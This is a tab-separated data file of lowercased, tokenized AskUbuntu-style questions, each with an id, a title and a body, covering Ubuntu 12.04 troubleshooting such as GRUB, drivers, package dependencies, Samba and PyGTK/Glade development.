155120	general rules for converting grub entries to grub 2 ?	i would like to change an entry for a solution to boot from cd from legacy grub ( looks like title bla bla bla ) to an entry to a format compatible to grub 2 ( the one that looks like menuentry `` bla bla bla '' { . the original legacy grub entry is as follows : title boot from cd/dvd drive kernel /boot/grub/memdisk.din initrd /boot/grub/sbootmgr.dsk is there any sort of conversion rule to change this to something like the example i 've put here on the next line ? ( this is from my precise 's grub.cfg . ) menuentry 'ubuntu , with linux 3.2.0-25-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos8 ) ' search -- no-floppy -- fs-uuid -- set=root efc87ac0-daac-4a32-9a85-ea57beff0e28 linux /boot/vmlinuz-3.2.0-25-generic root=uuid=efc87ac0-daac-4a32-9a85-ea57beff0e28 ro quiet splash acpi_osi= $ vt_handoff initrd /boot/initrd.img-3.2.0-25-generic }
155123	how can i disable automatic login on a liveusb ?	i 've just made myself a persistent liveusb , running ubuntu 12.04 , and i 've immediately found a problem - it logs you in automatically as root , and i do n't need this since i 'm going to keep files and private stuff on it . my question : how can i disable automatic login on a liveusb ?
155125	ubuntu 12.04 recovery mode root shell has no internet connection	i 'm debugging some things on my computer and i boot into recovery mode from the grub menu . then it gives me a bunch of options on what to do next , and i select the one that drops it to a root shell . however , apt-get complains about not being able to resolve hosts whenever i try to install anything . i 'm assuming this is because it is not connected to the internet . how can i enable the internet connection from the root shell ?
155128	want to back up using dd , but my present ubuntu installation is 149.04 + 3.81 ( swap ) gb , my target drive is only 149.05 gb	my netbook is a windows7-ubuntu 12.04 dual boot . in gparted the strcture looks like partition filesystem size /dev/sda2 extended 152.86gib __/dev/sda6 ext4 149.04gib __/dev/sda5 linux-swap 3.81gib /dev/sda3 ntfs 100mib /dev/sda4 ntfs 145.13gib /dev/sdb1 fat32 149.05gib i want to backup my ubuntu 12.04 installation that is sda2 ( sda6 + sda5 ) to sdb1 . as you can see sda5 +sda6 is 152.86 gb where are sdb1 is only 149.05 gb . can i backup only sda6 ( 149.04gb ) without losing any data ? that is to say , will i be able to restore my ubuntu using only sda6 and later add the needed swap ? edit : made it readable .
155131	use intel chip on systems with two graphics chips	i have a computer with two graphics chips . for reference , one is the nvidia gtx 670 , and the other is the integrated graphics on the intel 3770k . when i pull out the nvidia card , ubuntu uses the intel graphics chip just fine . however , when i put in the card , it seems to insist on using the nvidia one . even with the closed source drivers though , the intel chip works significantly better for general desktop usage . so is there any way i can have ubuntu use the intel chip rather than the nvidia one even when the nvidia card is plugged in ? ( also , if it 's possible , although not really necessary i would also like to be able to have it switch to the nvidia card when requested ) . ( if you are wondering why i bought the card when i 'm not planning on using it , i do use it on windows , and ideally i would like to use it for scientific computing/visualization ) .
155140	how can i use face-recognition to login ?	i am using ubuntu 12.04 64-bit . i am looking for a facial recognition program that i could use to log in to my account . i have heard of pam face recognition , but there does not appear to be a package for ubuntu 12.04 , and the ppa has been inactive for a while now . are there any alternatives that i could use ?
155143	some problems after running ubuntu tweak application	i downloaded the ubuntu tweak application . after that application has clean some file , the application it self is not starting now.. i am quiet new to linux much and fear that if the tweak application has cleaned some files which were necessary . is there anything i can fix these problems or short of auto-recovery , i have got some more leads : here seems to be the error but not sure how can i fix this . buntu-tweak:2887 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . traceback ( most recent call last ) : file `` /usr/bin/ubuntu-tweak '' , line 122 , in < module > from ubuntutweak.main import ubuntutweakwindow file `` /usr/lib/python2.7/dist-packages/ubuntutweak/main.py '' , line 40 , in < module > from ubuntutweak.preferences import preferencesdialog file `` /usr/lib/python2.7/dist-packages/ubuntutweak/preferences.py '' , line 32 , in < module > from ubuntutweak.factory import widgetfactory file `` /usr/lib/python2.7/dist-packages/ubuntutweak/factory.py '' , line 24 , in < module > from ubuntutweak.gui.widgets import * file `` /usr/lib/python2.7/dist-packages/ubuntutweak/gui/widgets.py '' , line 10 , in < module > from ubuntutweak.settings.compizsettings import compizsetting file `` /usr/lib/python2.7/dist-packages/ubuntutweak/settings/compizsettings.py '' , line 3 , in < module > import ccm file `` /usr/lib/python2.7/dist-packages/ubuntutweak/settings/ccm/__init__.py '' , line 1 , in < module > from conflicts import * file `` /usr/lib/python2.7/dist-packages/ubuntutweak/settings/ccm/conflicts.py '' , line 25 , in < module > from constants import * file `` /usr/lib/python2.7/dist-packages/ubuntutweak/settings/ccm/constants.py '' , line 77 , in < module > locale.setlocale ( locale.lc_all , `` '' ) file `` /usr/lib/python2.7/locale.py '' , line 539 , in setlocale return _setlocale ( category , locale ) locale.error : unsupported locale setting
155146	how can i install cinnamon on ubuntu 12.04 and eliminate the following errors:	$ sudo apt-get install cinnamon cinnamon-session cinnamon-settings reading package lists ... done building dependency tree reading state information ... done note , selecting 'cinnamon ' instead of 'cinnamon-session' note , selecting 'cinnamon ' instead of 'cinnamon-settings' some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : cinnamon : depends : gir1.2-muffin-3.0 but it is not going to be installed depends : libcogl5 ( > = 1.7.4 ) but it is not installable depends : libmuffin0 ( > = 1.0.0-0ubuntu1~precise ) but it is not going to be installed recommends : gnome-themes-standard but it is not going to be installed recommends : gnome-session-fallback but it is not going to be installed e : unable to correct problems , you have held broken packages . i added this ppa : sudo add-apt-repository ppa : merlwiz79/cinnamon-ppa then ran the following command : sudo apt-get update & & sudo apt-get install cinnamon cinnamon-session cinnamon-settings how can i install the latest cinnamon desktop ? how can i fix this error ?
155147	dropbox 99 % instalation crash . strange `` searching '' ubuntu software center bug	i just installed dropbox via ubuntu software center , and the known crash of 99 % , which was in ubuntu software center , happened . i want to remove dropbox completely since something went wrong , but i ca n't . when i start my ubuntu , it starts a process which eats up all of the cpu . in ubuntu software center , there is a process `` searching applying changes '' , but nothing really happens . when i 'm trying to uninstall dropbox , nothing happens , since the seaching thing is `` first '' . please , i 'm asking for a option which does n't include proper reinstallation of dropbox , only of getting rid of it , and without reinstalling the whole ubuntu system ( format , chaos etc ) .
155149	is it ok to remove appmenu-gtk and install appmenu-gtk : i386 ?	i wanted to eliminate some skype errors and by installing the appmenu-gtk : i386 package the errors were gone ! these were the errors : $ skype /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 ( skype:2841 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 ( skype:2841 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 ( skype:2841 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 ( skype:2841 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so the change was easy : sudo apt-get install appmenu-gtk : i386 i have n't noticed any `` weird '' outcome ( yet ) . the good thing was that it cleared the skype errors . but i have my doubts . has anyone tried something similar ? removing appmenu-gtk and installing appmenu-gtk : i386 on a 64-bit system ? could it break any applications ? similar question : resolving dependencies related to 32 bit libraries on 64 bit
155151	how to set multiple timezones in gnome classic ?	for some strange reason , additional timezones can not be added to the clock using the date-time indicator in gnome classic ( ubuntu 12.04 ) . i used unity before i switched to gnome classic , and it was possible to add more timezones . even in gnome classic i can see the other timezones in the menu of the date-time indicator which i added when i was still using unity . when i go to system settings > date and time , there is no option for adding other timezones . how can i set additional timezones in gnome classic ?
155163	how do i enable dns caching in the networkmanager-controlled dnsmasq ?	ubuntu desktop 12.04 uses dnsmasq to perform dns lookups , but it is not configured to cache these results . ( i have checked this by using dig to resolve names and i do not see a large improvement in the response time after the first lookup . ) how do i configure the networkmanager-controlled dnsmasq to cache the results of dns lookups ?
155166	monitor internet usage on ubuntu	any idea how one would monitor internet usage on a laptop to find out if any unauthorised program is making internet connections ?
155167	using .add ( ) on the same widget more than once	i asked this question on reddit and was directed here . http : //www.reddit.com/r/ubuntu/comments/vhadl/quickly_dynamic_ui/ unfortunately i am having the same issue and the problems seems that you can only use .add ( ) on a widget once . so here is my code , self.ui.labels = [ ] for titles in entries : label = gtk.label ( ) self.ui.labels.append ( label ) self.ui.viewport1.add ( self.ui.labels [ -1 ] ) self.ui.paned1.show_all ( ) now , for fun i decided `` what would happen if i just manually did ... '' self.ui.viewport1.add ( gtk.label ( ) ) self.ui.viewport1.add ( gtk.button ( ) ) self.ui.viewport1.add ( gtk.entry ( ) ) for my first code snippet i get this error , gtk-critical ** : gtk_viewport_add : assertion gtk_bin_get_child ( bin ) == null ' failed the error happens an unknown amount of times because the list entries can vary in length , but for my second code snippet it happens exactly twice . this means that when i viewport1.add ( ) it works the first time , but all adds after that receive the error above . so my question , is there a way in python to use .add ( ) on the same widget more than once ?
155168	skype not working	i downloaded the latest upgrade in may 2012 , and as always , i experienced some issues . my skype is no longer working . i 've tried to uninstall and reinstall and it still locks up every time i try to use it . i 've tried logging onto ubuntu with the previous version and it still wo n't work . are there any solutions for someone who has limited knowledge of linux ?
155169	how do i download a torrent in deluge ?	i am trying to download a torrent . i try to navigate to the magnet link , but my web browser asks me what program the link should open with . i tried to find browse to deluge in the window , but it 's no there !
155170	can not install gimp	i tried to install gimp but i get an error that there are unmet dependencies . how can i handle that . i am running ubuntu 12.04 in 64 bit . this is the message i get : the following packages have unmet dependencies : gimp : depends : python-gtk2 ( > = 2.8.0 ) but 2.24.0-3 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10 is to be installed depends : libfontconfig1 ( > = 2.8.0 ) but 2.8.0-3ubuntu9 is to be installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but 2.26.1-1 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.3-0ubuntu1 is to be installed depends : libgtk2.0-0 ( > = 2.24.0 ) but 2.24.10-0ubuntu6 is to be installed depends : libjpeg8 ( > = 8c ) but 8c-2ubuntu7 is to be installed depends : librsvg2-2 ( > = 2.14.4 ) but 2.36.1-0ubuntu1 is to be installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed depends : python ( > = 2.7.1-0ubuntu2 ) but 2.7.3-0ubuntu2 is to be installed
155173	launcher icons are invisible after upgrade from 11.10 to 12.04	i am re-purposing an old laptop . i installed 11.10 on it and then immediately upgraded to 12.04 . ( i could not directly install 12.04 as my system does not support pae . ) when my system was ( briefly ) 11.10 , the desktop appeared as expected . however , after the upgrade to 12.04 , the icons in the launcher area are invisible . if i hover over the spot where the icon should be the little popup window showing the tool 's name appears , and i can click to invoke the tool . i just can not see the icons . the icons do appear as expected in other contexts , for example in the home folder and in dash home . my theme is `` ambiance ( default ) '' i do not have a ~/.icons folder . this is the top level contents of /usr/share/icons : default dmz-black dmz-white gnome handhelds hicolor highcontrast highcontrastinverse humanity humanity-dark locolor loginicons lowcontrast redglass ubuntu-mono-dark ubuntu-mono-light unity-icon-theme whiteglass ( sorry for the poor formatting , ca n't get it to show in list . ) i suspect that the launcher is n't looking for the icons in the right place , but i do n't know how to confirm that , or how to correct . this is my first foray into linux , although i used to use unix a few decades ago . this does n't look much like my old sun workstation , though ! does anyone have any suggestions or insights for me ? thanks .
155174	can not delete recovered files !	i recovered some files through photorec and saved them on my desktop . however , now when i try to delete them it says i do not have the permission to , and in properties it shows that root owns those files . any idea how do i get rid of those files ? p.s . i am new to linux so a step by step solution will be appreciated . thanks
155175	what are the different application directories in a quickly ubuntu-application template for ?	when you create a new ubuntu-application with quickly you will notice that it creates a directory structure like this : myapp/ setup.py bin/ help/ tests/ setup.py myapp/ myapp_lib/ what are each one for ? and what should be placed in myapp and myapp_lib ?
155178	no sound card detected in sound settings , although sound works	i have ubuntu 12.04 installed on my laptop . when i go to sound settings while logged into my user , no sound card appears detected . in spite of this , the sound on my laptop is working ok , and i can use alsamixer just fine . the unity sound indicator is dead , and this is quite annoying . if i login as guest , the sound indicator works just fine , i assume it 's something related to my user 's sound settings , but i can not find what exactly . any clues ?
155183	in glade , how do i set a widget size ( i.e . minimum and maximum ) ?	i want to set the size of one of the widgets of an app developed with quickly and glade . i know how to set a minimum size in the 'common ' tab , with 'width request ' and 'height request ' . but i would like to set also the maximum size . how do i do thatâ ? that way , i will also have the possibility to set the size entirely , if i force minimum = maximum .
155185	how can i relocate the default quickly directory ?	i do n't want quickly to create applications in my home folder by default . instead i want them to be in ~/projects . is there a way to do this ?
155190	how can i modify the small icon and title bar fonts in unity ?	as you can see in the screenshot , the fonts for the title bar ( any window ) and for the icons within the file browser ( as well as in the navigation pane to the left ) are very very small , i have tried to fix this by a number of ways including using myunity , but to no avail . could someone please help me with this as it can render my pc unnavigatable unless i 'm sitting right up against it , and even then i struggle . i am using ubuntu 12.04 .
155195	exhibiting weird behavior from xfce after installing samba	after installing samba , i rebooted and now the top bar from every window i missing ( where you can minimize , expand , or close , and drag window around ) . what gives ? another thing i notice that i while in command prompt , i was not able to see anything in the media folder until i browsed there through file manager , then the associated media ( antoher sata hd ) . then i would appear in command line .
155197	how can i improve the power consumption of the open source amd graphics drivers ?	how i can optimize the power consumption of the open source radeon driver ? i do n't want to use official amd driver cause of an error with sleep mode . amd e-450 cpu\gpu .
155203	problems with secondary battery	i have a problem with my secondary battery . some time ago , i closed my notebook lid ( an hp probook 6450b ) . when i opened it again , the notebook did n't wake up from standby mode because my first battery was running low ( before closing the notebook , ubuntu showed me a remaining charge of 2 % for about 20 minutes ) . but i had a fully charged secondary battery connected to the notebook . why did n't ubuntu recognize that the secondary battery had plenty of charge ? under windows 7 i did n't have this problem . as a second question , is there a way to make ubuntu discharge my secondary battery first ? it usually discharges the `` internal '' battery first , but i want the other one to be discharged first .
155206	grub in rescue mode after ( failed ) upgrade to 12.04	i am an 81 year old pretty much newbie . i decided to upgrade my netbook to 12.04 from a usb and got an error message : `` the symbol 'grub_xputs ' not found '' and a grub rescue prompt . my eee 901 has a ( faster ) 4g ssd ( sda1 ) and a ( slower ) 16g ssd ( sdb1 ) . as i have done in the past , i mounted / on the little drive and /home on the big one . i tried to install boot-repair from the usb but was unsuccessful . what do i do now ?
155211	do i gpg-sign my application before or after packaging ?	i am almost ready to complete my app , but i am unclear on the sequence of packing a completed app , and getting it uploaded so users of the software center can find it for installing . does the signing of the files with a gpg key have to be done to just the debian/ directory , or do i have to use a quickly command to upload it and it is then signed on launchpad ?
155213	can not boot kubuntu after cd install	i have installed kubuntu 11.04 and had to install it several times before it would boot up after the cd install . i would get the message that no operating system found . i upgraded to 11.xx and it worked fine . i then wanted to put 12.04 on the hp desktop and it will not boot either after several installs . i went back to try to install the 11.04 as it worked before but now it does not boot either . i need help with this process . anyone out there have any suggestions ?
155214	how do i stop a container box from expanding horizontally in glade ?	currently , when my button 's label gets more characters , its container boxes resize horizontally , and push away the other containers next to it . i do n't want this behaviour . how do i give my boxes a fixed width , so that they do n't get resized anymore when their child widgets get bigger ? project : http : //bazaar.launchpad.net/~robinj/gtkreddit/trunk/files
155216	need to mount a drive before samba kicks in at boot . how to ?	how do i make sure that a hard drive is mounted to a certain location before samba kicks in ? i 'd like to use the samba to share out the hard drive .
155218	boot to safe mode to reset password not available	ubuntu 11.10 password to root was lost trying to reboot in safe mode to reset holding shift ( left or right ) esc f1 none are effective during bootup . no bios setting appear applicable . all forums seem to indicate left shift should work . any alternatives to boot into recovery/safe mode ? always more than one way to skin a cat on linux ... got ta love it . : )
155221	why changing signals causes nameerrors in a sane code ? - pygtk issue	i 'm working on a very simple app for ubuntu . i 've asked a question on stackoverflow , and it seems that the issue i am having is caused by signals , not by the scope of variables , as i originally thought . the problem i am having is that when textbox emits a signal through activate the whole code works without a glitch . but when i change the signal to insert-at-click it returns nameerrors in every non-textbox-linked function . now , it is highly possible i am doing something completely wrong here , but is it at least probable that signals could affect global variable assignments ? the code in its current form giving me nameerrors : def on_servername_insertatcursor ( self , widget ) : global output output = stringio.stringio ( ) servername = widget.get_text ( ) output.write ( `` ushare_name= '' +servername+'\n ' ) def on_netif_changed ( self , widget ) : netif = widget.get_active_text ( ) global output output.write ( `` ushare_iface= '' +netif+'\n ' ) def on_port_insertatcursor ( self , widget ) : global output port = widget.get_text ( ) output.write ( `` ushare_port= '' +port+'\n ' ) def on_telprt_insertatcursor ( self , widget ) : global output telprt = widget.get_text ( ) output.write ( `` ushare_telnet_port= '' +telprt+'\n ' ) def on_dirs_insertatcursor ( self , widget ) : global output dirs = widget.get_text ( ) output.write ( `` ushare_dir= '' +dirs+'\n ' ) def on_iconv_toggled ( self , widget ) : global output iconv = widget.get_active ( ) if iconv == true : output.write ( `` ushare_override_iconv_err= '' + '' true '' +'\n ' ) else : output.write ( `` ushare_override_iconv_err= '' + '' false '' +'\n ' ) def on_webif_toggled ( self , widget ) : global output webif = widget.get_active ( ) if webif == true : output.write ( `` ushare_enable_web= '' + '' yes '' +'\n ' ) else : output.write ( `` ushare_enable_web= '' + '' no '' +'\n ' ) def on_telif_toggled ( self , widget ) : global output telif = widget.get_active ( ) if telif == true : output.write ( `` ushare_enable_telnet= '' + '' yes '' +'\n ' ) else : output.write ( `` ushare_enable_telnet= '' + '' no '' +'\n ' ) def on_xbox_toggled ( self , widget ) : global output xbox = widget.get_active ( ) if xbox == true : output.write ( `` ushare_enable_xbox= '' + '' yes '' +'\n ' ) else : output.write ( `` ushare_enable_xbox= '' + '' no '' +'\n ' ) def on_dlna_toggled ( self , widget ) : global output dlna = widget.get_active ( ) if dlna == true : output.write ( `` ushare_enable_dlna= '' + '' yes '' +'\n ' ) else : output.write ( `` ushare_enable_dlna= '' + '' no '' +'\n ' ) def on_commit_clicked ( self , widget ) : commit = output.getvalue ( ) logfile = open ( '/home/boywithaxe/desktop/ushare.conf ' , 'w ' ) logfile.write ( commit ) def on_endprogram_clicked ( self , widget ) : sys.exit ( 0 )
155222	will contacts ever sync with thunderbird in ubuntu 12.04 ?	status message says there is yet more disruption to this service . are ubuntu actually serious about this service , or should we all just look for another provider ?
155224	debian/rules error `` no rule to make target ''	i 'm having some problems creating a .deb file with debuild before reading some tutorials i managed to make the file but i always get this error : make : *** no rule to make target «build» . stop . dpkg-buildpackage : failure : debian/rules build gave error exit status 2 debuild : fatal error at line 1329 : dpkg-buildpackage -rfakeroot -d -us -uc -b failed any help ? ? this is my debian rules file : # ! /usr/bin/make -f # -*- makefile -*- # sample debian/rules that uses debhelper . # this file was originally written by joey hess and craig small . # as a special exception , when this file is copied by dh-make into a # dh-make output file , you may use that output file without restriction . # this special exception was added by craig small in version 0.37 of dh-make . # uncomment this to turn on verbose mode . # export dh_verbose=1 build-stamp : configure-stamp dh_testdir touch build-stamp clean : dh_testdir dh_testroot rm -f build-stamp configure-stamp dh_clean install : build dh_testdir dh_testroot dh_clean -k dh_installdirs $ ( make ) install destdir= $ ( curdir ) /debian/pycounter mkdir -p $ ( curdir ) /debian/pycounter # copy .py files cp pycounter.py $ ( curdir ) /debian/pycounter/opt/extras.ubuntu.com/pycounter/pycounter.py cp prefs.py $ ( curdir ) /debian/pycounter/opt/extras.ubuntu.com/pycounter/prefs.py # desktop copyright and others ( not complete , check ) cp extras-pycounter.desktop $ ( curdir ) /debian/pycounter/usr/share/applications/extras-pycounter.desktop
155227	is samba required if you do n't share folders and do n't have any printers ?	i wish to remove all unnecessary packages and services from ubuntu 12.04 . i was not clear whether samba is required for things other than sharing folders and printing . i do n't do either of these tasks .
155236	toggle unity launcher mode using python ?	i 'm trying to make an application indicator that toggles the launcher mode : either normal or auto-hide . right now i can toggle the gconf key /apps/compiz-1/plugins/unityshell/screen0/options/launcher_hide_mode which is either 0 or 1 . however , the launcher does n't actually change its mode . how can i make unity recognize that the gconf key value changed ?
155244	how do i calculate a swap partition ?	since the late 90s i 've always understood that it is best practice to allocate twice the amount of physical ram as swap space . i just received my new laptop in the mail and it came with 6gb of ram . in a separate order i had 16gb of ram to replace the preinstalled . i did n't have the right torx driver to get to the ram in this machine , so i installed ubuntu and manually set a 16gb partition for swap . 32gb seemed a tad excessive ... did i make the right choice ? would my machine perform better if there was no swap at all ?
155247	bluetooth settings shows the error `` no bluetooth adaptor found ''	i 'm gettng a `` no bluetooth adaptor '' found message under blutooth settings when i have an adaptor and it 's on . why ? i have a sony vaio cr343nb .
155248	how can i have nagios alerts emailed to my gmail ?	i 'd like to set up some sort of mail server to send emails from from my gmail account to another email . how can i do this ?
155251	why am i stuck at 640x480 on an optimus hybrid-graphics system ?	i have intel hd 3000 graphics card onboard and nvidia 520 mx optimus techolonogy card . i was try to install nvidia driver but it was failure . now i cant use anything . have one resolution 640x480 every media disconnected and i cant connect $ xrandr screen 0 : minimum 320 x 200 , current 640 x 480 , maximum 8192 x 8192 lvds1 connected 640x480+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 640x480 59.9* vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) glxinfo | grep vendor server glx vendor string : sgi client glx vendor string : mesa project and sgi opengl vendor string : tungsten graphics , inc blockquote something wrong here i guess i try to some solutions but didnt work even it cant nvidia-xconfig file after these by the way system get eror sometimes about xorg sorry for my english thaks for help .
155252	my top panel and launcher is gone after trying to install dropbox	i just upgraded from ubuntu 11.10 to 12.04 and when i tried to install dropbox it froze at 99 % . then i hit the reset button and i lost the control panel on top and the launcher . i then tried ctrl+alt+f1 and nothing happened . any advice ?
155255	black screen white cursor and ca n't boot from live disc that i installed from just yesterday ( ubuntu 12.04 )	so , i 've decided to change to ubuntu from windows 7 after reformatting . install goes smoothly , i 've set everything up , and it works for a day . it crashed when i had a full screen video , froze , so i rebooted , and now i ca n't get past the black screen with flashing white underscore cursor . if i wait a while , i get `` reboot and select proper boot device or insert boot media in selected boot device and press any key '' i 've tried that , removed any boot options but the dvd drive , even tried my windows 7 boot cd as well . nothing boots , so i ca n't do anything . this is on an asus a52n laptop , and all i can access now is the bios ( version k52n 217 ) , as far as i can tell .
155257	why do n't the waves maxx speaker effects work in ubuntu ?	i have a new machine that comes with jbl 2.1 speakers with waves maxx audio 3 . on windows it sounds perfect , though in ubuntu 12.04 i get cheap/sound with simple mp3 files . i have tried a few things on different blogs but no luck so far . any ideas ? aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc665 analog [ alc665 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : alc665 digital [ alc665 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : n700 [ logitech speaker lapdesk n700 ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0
155260	why is n't `auto-remove ' removing all unnecessary dependencies ?	i just installed a package ( dansguardian in this case ) and apt told me that i had unmet dependencies . # sudo apt-get install dansguardian reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : clamav clamav-base clamav-freshclam libclamav6 libtommath0 suggested packages : clamav-docs squid libclamunrar6 the following new packages will be installed : clamav clamav-base clamav-freshclam dansguardian libclamav6 libtommath0 0 upgraded , 6 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/4,956 kb of archives . after this operation , 14.4 mb of additional disk space will be used . do you want to continue [ y/n ] ? so i installed it and the dependencies . so far so good . later on , i decide that this package just is n't the package for me , so i want to remove it and all of the other junk it installed with it since i 'm not going to be needing any of it : # sudo apt-get remove -- auto-remove -- purge dansguardian reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : dansguardian 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 1,816 kb disk space will be freed . do you want to continue [ y/n ] ? however it is only removing that one specific package . what about clamav clamav-base clamav-freshclam libclamav6 libtommath0 ? not only did it not remove them , but clamav was actually running a daemon that loads every time the computer boots . i thought that -- auto-remove would remove not only the packages , but also the dependencies that were installed with it . so basically , without going through the apt history log file ( if i even remember to do so , or if i even remember that a specific package i installed 3 months ago had dependencies along with it ) , is there a way to remove a package and all of the other dependencies that were installed like in this case ?
155263	switching os from ubuntu to xp ?	i originally had windows xp on my computer . then i decided to download ubuntu 12.04 . i did n't use any cds or usbs or anything . i did not know that in doing so i would n't have access to any of my files . if i switch back to xp will my files still be there ? if so , how do i switch back ?
155269	how do i apply the unity theme to libreoffice on kubuntu ?	i installed kubuntu 11.10 and installed unity on it . but still libreoffice follows the kde icon theme . how do i get ubuntu 's default icon theme in libreoffice ?
155270	secondary display showing ubuntu logo , but is not detected	i recently installed ubuntu using wubi , and it worked perfectly . however , my laptop is showing the main desktop screen , and my secondary display is only showing the ubuntu logo with its loading bar underneath , nothing more . when i go to 'displays ' it is only detecting my laptop screen , and not my asus monitor ( connected with a vga ) . things i 've done so far : unplug and replug vga cable . reboot computer . re-install ubuntu . checked to see if any drivers needed to be installed . none were needed . i have a thinkpad w520 , with a nvidia quadro 1000m thanks for the help !
155274	how do i share a public folder with windows users ?	i am new to ubuntu , i would like to share a folder to my windows machines on my lan but the whole permissions thing is a bit of a mystery . should i share the public folder contained within my home folder byt right clicking on it and using the share option ? thanks ! noob
155278	how do i set the root password so i can use su instead of sudo ?	instead of letting you set a password for root during install ubuntu set it to * for no password and disables the actual account login , however even with this being said you can still use root in ubuntu by sudo . so how to set a root password on ubuntu ?
155288	how can i access an external hard drive through ubuntu linux ?	i have a western digital external hd of around 2tb ; windows 7 for some reason no longer allows me to open it : when i plug it into my laptop ( via a usb 2.0 port ) , windows either does nothing or asks me to format the drive because it does n't recognize the file system . so i am trying to see if i can access the files in ubuntu . i am running ubuntu through virtualbox . before starting ubuntu , i went into the usb settings for the ubuntu virtual machine , and selected the external hard drive ( vbox sees it ) . then i started ubuntu . here is the print out of fdisk -l : disk /dev/sda : 91.3 gb , 91268055040 bytes 255 heads , 63 sectors/track , 11096 cylinders , total 178257920 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d5f79 device boot start end blocks id system /dev/sda1 * 2048 174583807 87290880 83 linux /dev/sda2 174585854 178255871 1835009 5 extended /dev/sda5 174585856 178255871 1835008 82 linux swap / solaris disk /dev/sdb : 2000.4 gb , 2000396746752 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907024896 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00020fc3 device boot start end blocks id system /dev/sdb1 * 2048 3907024895 1953511424 7 hpfs/ntfs/exfat i believe the external drive is the bottom one , sdb1 , but i have no idea how to access it . is it already mounted or do i have to mount it manually ? if windows 7 did not recognize it , will the same problem occur in ubuntu ?
155289	how do i install the firestorm viewer for second life ?	i am new to ubuntu and trying to set everything up . i am very bad at doing that at the moment . in fact , i asked another question here only a few hours ago . anyways , i am trying to get the firestorm viewer for second life . i followed instruction given here : http : //michaelferrie.blogspot.com/2012_04_01_archive.html and came up with these end results : cordenne @ ubuntu : ~ $ sudo apt-get install ia32-libs [ sudo ] password for cordenne : reading package lists ... done building dependency tree reading state information ... done ia32-libs is already the newest version . the following packages were automatically installed and are no longer required : libnspr4-0d : i386 libgconf2-4 : i386 libnss3-1d : i386 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 7 not upgraded . cordenne @ ubuntu : ~ $ '/home/cordenne/install.sh ' you are not running as a privileged user , so you will only be able to install the firestorm viewer in your home directory . if you would like to install the firestorm viewer system-wide , please run this script as the root user , or with the 'sudo ' command . proceed with the installation ? [ y/n ] : y - installing to /home/cordenne/firestorm cp : can not copy a directory , `/home/cordenne/firestorm ' , into itself , `/home/cordenne/firestorm/firestorm' failed cordenne @ ubuntu : ~ $ cordenne @ ubuntu : ~ $ so , still no firestorm . can anyone help . ps : when it said - installing to /home/cordenne/firestorm i felt it was talking to long to ... i guess do anything so i pressed 'enter ' . i do n't know if that made a difference but if it does , now you know !
155294	why does ubuntu or linux for that matter mount hard disk partitions when they are opened ?	i love linux because i get to learn things about my pc . one thing that keeps nagging me is this . i have two partitions for file storage , besides the root partition . ubuntu mounts any partition i open and shows it in desktop . i do n't see windows mounting my partitions when i open one , but that may be just under the hood . it might be a simple thing but i want to know . sorry if i 'm sounding stupid .
155298	how do i add a notebook to a box in a vbox ?	i have created an empty box in glade to add a notebook to . the reason i am not adding the actual notebook in glade is because i hear that you can not add pages to a notebook made in glade . so , in glade i have created a box in an empty slot in a vbox . the code i am running is : self.box = self.builder.get_object ( `` box '' ) self.subjects = gtk.notebook ( ) self.box.add ( self.subjects ) nothing happens upon running , except these warnings which i believe will just occur anyway : /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `window ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `notetakerwindow ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds )
